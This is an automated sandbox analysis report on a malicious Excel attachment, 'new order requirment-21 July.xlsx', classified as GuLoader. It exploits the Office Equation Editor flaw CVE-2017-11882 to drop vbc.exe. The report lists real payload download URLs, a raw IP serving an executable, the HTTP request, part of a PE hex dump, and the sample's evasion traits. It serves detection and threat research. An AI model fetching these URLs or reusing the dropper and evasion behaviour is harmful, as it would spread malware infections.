Windows Analysis Report new order requirment-21 July.xlsx

Overview

General Information

Sample Name:	new order requirment-21 July.xlsx
Analysis ID:	451759
MD5:	25f7735ff71a70abf4bb508d2711f50b
SHA1:	7f40fff223019a3e399ca0ae0990afaf2695e93b
SHA256:	821f2880a8218afc0d30711b46f7d28e9adb2cd6c3db88b881de91090e72337f
Tags:	VelvetSweatshopxlsx
Infos:
Most interesting Screenshot:

Detection

GuLoader

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Droppers Exploiting CVE-2017-11882

Sigma detected: EQNEDT32.EXE connecting to internet

Sigma detected: File Dropped By EQNEDT32EXE

Yara detected GuLoader

C2 URLs / IPs found in malware configuration

Contains functionality to detect hardware virtualization (CPUID execution measurement)

Drops PE files to the user root directory

Office equation editor drops PE file

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Sigma detected: Execution from Suspicious Folder

Abnormal high CPU Usage

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to call native functions

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Document misses a certain OLE stream usually present in this Microsoft Office document type

Downloads executable code via HTTP

Drops PE files

Drops PE files to the user directory

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Office Equation Editor has been started

PE file contains strange resources

Potential document exploit detected (performs HTTP gets)

Potential document exploit detected (unknown TCP traffic)

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Classification

Signatures

AV Detection:

Found malware configuration

Source: 00000006.00000002.2351636945.00000000002F0000.00000040.00000001.sdmp

Malware Configuration Extractor: GuLoader {"Payload URL": "https://kinmirai.org/wp-content/bin_lOulvHP91.bip"}

Multi AV Scanner detection for domain / URL

Source: http://180.214.239.39/service/.svchost.exe

Virustotal: Detection: 6%

Perma Link

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.svchost[1].exe	Virustotal: Detection: 14%			Perma Link
Source: C:\Users\Public\vbc.exe	Virustotal: Detection: 14%			Perma Link

Multi AV Scanner detection for submitted file

Source: new order requirment-21 July.xlsx	Virustotal: Detection: 30%			Perma Link
Source: new order requirment-21 July.xlsx	ReversingLabs: Detection: 28%

Exploits:

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe			Jump to behavior

Office Equation Editor has been started

Source: unknown

Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source:

Binary string: C:\Program Files (x86)\Administrator-Cloud\Projects\typo.pdb source: .svchost[1].exe.4.dr

Software Vulnerabilities:

Potential document exploit detected (performs HTTP gets)

Source: global traffic

TCP traffic: 192.168.2.22:49165 -> 180.214.239.39:80

Potential document exploit detected (unknown TCP traffic)

Source: global traffic

TCP traffic: 192.168.2.22:49165 -> 180.214.239.39:80

Source: excel.exe

Memory has grown: Private usage: 4MB later: 68MB

Networking:

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: https://kinmirai.org/wp-content/bin_lOulvHP91.bip

Downloads executable code via HTTP

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 21 Jul 2021 06:30:40 GMTServer: Apache/2.4.47 (Win64) OpenSSL/1.1.1k PHP/7.3.28Last-Modified: Tue, 20 Jul 2021 21:04:05 GMTETag: "3c468-5c79464e23873"Accept-Ranges: bytesContent-Length: 246888Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c7 bf 79 da 83 de 17 89 83 de 17 89 83 de 17 89 00 c2 19 89 82 de 17 89 cc fc 1e 89 87 de 17 89 b5 f8 1a 89 82 de 17 89 52 69 63 68 83 de 17 89 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 1c e1 51 55 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 30 03 00 00 70 00 00 00 00 00 00 30 13 00 00 00 10 00 00 00 40 03 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 07 00 00 00 04 00 00 00 00 00 00 00 00 b0 03 00 00 10 00 00 62 71 04 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 54 30 03 00 28 00 00 00 00 50 03 00 b4 54 00 00 00 00 00 00 00 00 00 00 50 b0 03 00 18 14 00 00 00 00 00 00 00 00 00 00 00 11 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 02 00 00 20 00 00 00 00 10 00 00 f8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 a0 24 03 00 00 10 00 00 00 30 03 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 90 0b 00 00 00 40 03 00 00 10 00 00 00 40 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b4 54 00 00 00 50 03 00 00 60 00 00 00 50 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 c3 1f b0 49 10 00 00 00 00 00 00 00 00 00 00 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0

IP address seen in connection with other malware

Source: Joe Sandbox View

IP Address: 180.214.239.39 180.214.239.39

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN

Uses a known web browser user agent for HTTP communication

Source: global traffic

HTTP traffic detected: GET /service/.svchost.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 180.214.239.39Connection: Keep-Alive

Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\DE6E00F3.emf

Jump to behavior

Source: global traffic

Source: .svchost[1].exe.4.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: .svchost[1].exe.4.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: .svchost[1].exe.4.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: .svchost[1].exe.4.dr	String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: .svchost[1].exe.4.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: .svchost[1].exe.4.dr	String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: .svchost[1].exe.4.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: .svchost[1].exe.4.dr	String found in binary or memory: http://ocsp.digicert.com0O
Source: DE6E00F3.emf.0.dr	String found in binary or memory: http://www.day.com/dam/1.0
Source: .svchost[1].exe.4.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: .svchost[1].exe.4.dr	String found in binary or memory: https://www.digicert.com/CPS0

System Summary:

Office equation editor drops PE file

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\Public\vbc.exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.svchost[1].exe			Jump to dropped file

Abnormal high CPU Usage

Source: C:\Users\Public\vbc.exe

Process Stats: CPU usage > 98%

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Source: C:\Users\Public\vbc.exe	Memory allocated: 76E20000 page execute and read and write			Jump to behavior
Source: C:\Users\Public\vbc.exe	Memory allocated: 76D20000 page execute and read and write			Jump to behavior

Contains functionality to call native functions

Source: C:\Users\Public\vbc.exe	Code function: 6_2_002F53FF NtAllocateVirtualMemory,	6_2_002F53FF
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002F5541 NtAllocateVirtualMemory,	6_2_002F5541
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002F53FB NtAllocateVirtualMemory,	6_2_002F53FB

Detected potential crypto function

Source: C:\Users\Public\vbc.exe	Code function: 6_2_002F53FF	6_2_002F53FF
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002F2407	6_2_002F2407
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002F207C	6_2_002F207C
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002F444B	6_2_002F444B
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002F5844	6_2_002F5844
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002F7CB7	6_2_002F7CB7
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002F38B4	6_2_002F38B4
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002F8C81	6_2_002F8C81
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002F40EF	6_2_002F40EF
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002F04C0	6_2_002F04C0
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002F58D6	6_2_002F58D6
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002F293F	6_2_002F293F
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002F2567	6_2_002F2567
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002F6D5C	6_2_002F6D5C
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002F51A4	6_2_002F51A4
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002F01E9	6_2_002F01E9
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002F21DB	6_2_002F21DB
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002F01DA	6_2_002F01DA
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002F05D8	6_2_002F05D8
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002F7229	6_2_002F7229
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002F0626	6_2_002F0626
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002F1207	6_2_002F1207
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002F8605	6_2_002F8605
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002F824D	6_2_002F824D
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002F2A43	6_2_002F2A43
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002F7EB4	6_2_002F7EB4
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002F3EB2	6_2_002F3EB2
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002F7AEF	6_2_002F7AEF
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002F06E2	6_2_002F06E2
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002F7AF5	6_2_002F7AF5
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002F26CA	6_2_002F26CA
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002F3EC0	6_2_002F3EC0
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002F06D2	6_2_002F06D2
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002F1B2E	6_2_002F1B2E
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002F1B24	6_2_002F1B24
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002F1706	6_2_002F1706
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002F6F73	6_2_002F6F73
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002F4345	6_2_002F4345
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002F8B5E	6_2_002F8B5E
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002F8B51	6_2_002F8B51
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002F3FA8	6_2_002F3FA8
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002F37A5	6_2_002F37A5
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002F3FE9	6_2_002F3FE9
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002F3BE2	6_2_002F3BE2
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002F47FF	6_2_002F47FF
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002F53FB	6_2_002F53FB
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002F3FC2	6_2_002F3FC2

Document misses a certain OLE stream usually present in this Microsoft Office document type

Source: new order requirment-21 July.xlsx

OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false

PE file contains strange resources

Source: .svchost[1].exe.4.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: .svchost[1].exe.4.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: .svchost[1].exe.4.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: vbc.exe.4.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: vbc.exe.4.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: vbc.exe.4.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: classification engine

Classification label: mal100.troj.expl.evad.winXLSX@4/19@0/1

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\Desktop\~$new order requirment-21 July.xlsx

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Temp\CVRD6DE.tmp

Jump to behavior

Source: C:\Users\Public\vbc.exe

Section loaded: C:\Windows\SysWOW64\msvbvm60.dll

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\Public\vbc.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: new order requirment-21 July.xlsx	Virustotal: Detection: 30%
Source: new order requirment-21 July.xlsx	ReversingLabs: Detection: 28%

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: unknown	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'	Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems

Jump to behavior

Source: new order requirment-21 July.xlsx

Static file information: File size 1242112 > 1048576

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source:

Binary string: C:\Program Files (x86)\Administrator-Cloud\Projects\typo.pdb source: .svchost[1].exe.4.dr

Source: new order requirment-21 July.xlsx

Initial sample: OLE indicators vbamacros = False

Source: new order requirment-21 July.xlsx

Initial sample: OLE indicators encrypted = True

Data Obfuscation:

Yara detected GuLoader

Source: Yara match

File source: 00000006.00000002.2351636945.00000000002F0000.00000040.00000001.sdmp, type: MEMORY

Yara detected GuLoader

Source: Yara match	File source: 6.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.0.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000006.00000002.2351658606.0000000000401000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000000.2137818883.0000000000401000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.svchost[1].exe, type: DROPPED
Source: Yara match	File source: C:\Users\Public\vbc.exe, type: DROPPED

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\Public\vbc.exe	Code function: 6_2_002212F5 push edx; ret	6_2_00221321
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00221023 push edx; ret	6_2_00221051
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00222823 push edx; ret	6_2_00222851
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00224023 push edx; ret	6_2_00224051
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00227024 push edx; ret	6_2_00227051
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00225825 push edx; ret	6_2_00225851
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00224833 push edx; ret	6_2_00224861
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00223033 push edx; ret	6_2_00223061
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00221833 push edx; ret	6_2_00221861
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00226034 push edx; ret	6_2_00226061
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00220038 push edx; ret	6_2_00220061
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00224803 push edx; ret	6_2_00224831
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00223003 push edx; ret	6_2_00223031
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00221803 push edx; ret	6_2_00221831
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00226004 push edx; ret	6_2_00226031
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00220008 push edx; ret	6_2_00220031
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00223813 push edx; ret	6_2_00223841
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00225013 push edx; ret	6_2_00225041
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00222014 push edx; ret	6_2_00222041
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00226814 push edx; ret	6_2_00226841
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00220818 push edx; ret	6_2_00220841
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00223063 push edx; ret	6_2_00223091
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00221863 push edx; ret	6_2_00221891
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00224863 push edx; ret	6_2_00224891
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00226065 push edx; ret	6_2_00226091
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00220068 push edx; ret	6_2_00220091
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00222074 push edx; ret	6_2_002220A1
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00223874 push edx; ret	6_2_002238A1
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00225074 push edx; ret	6_2_002250A1
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00226875 push edx; ret	6_2_002268A1
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00220878 push edx; ret	6_2_002208A1

Persistence and Installation Behavior:

Drops PE files

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\Public\vbc.exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.svchost[1].exe			Jump to dropped file

Drops PE files to the user directory

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\Public\vbc.exe

Jump to dropped file

Boot Survival:

Drops PE files to the user root directory

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\Public\vbc.exe

Jump to dropped file

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: new order requirment-21 July.xlsx

Stream path 'EncryptedPackage' entropy: 7.99879866952 (max. 8.0)

Malware Analysis System Evasion:

Contains functionality to detect hardware virtualization (CPUID execution measurement)

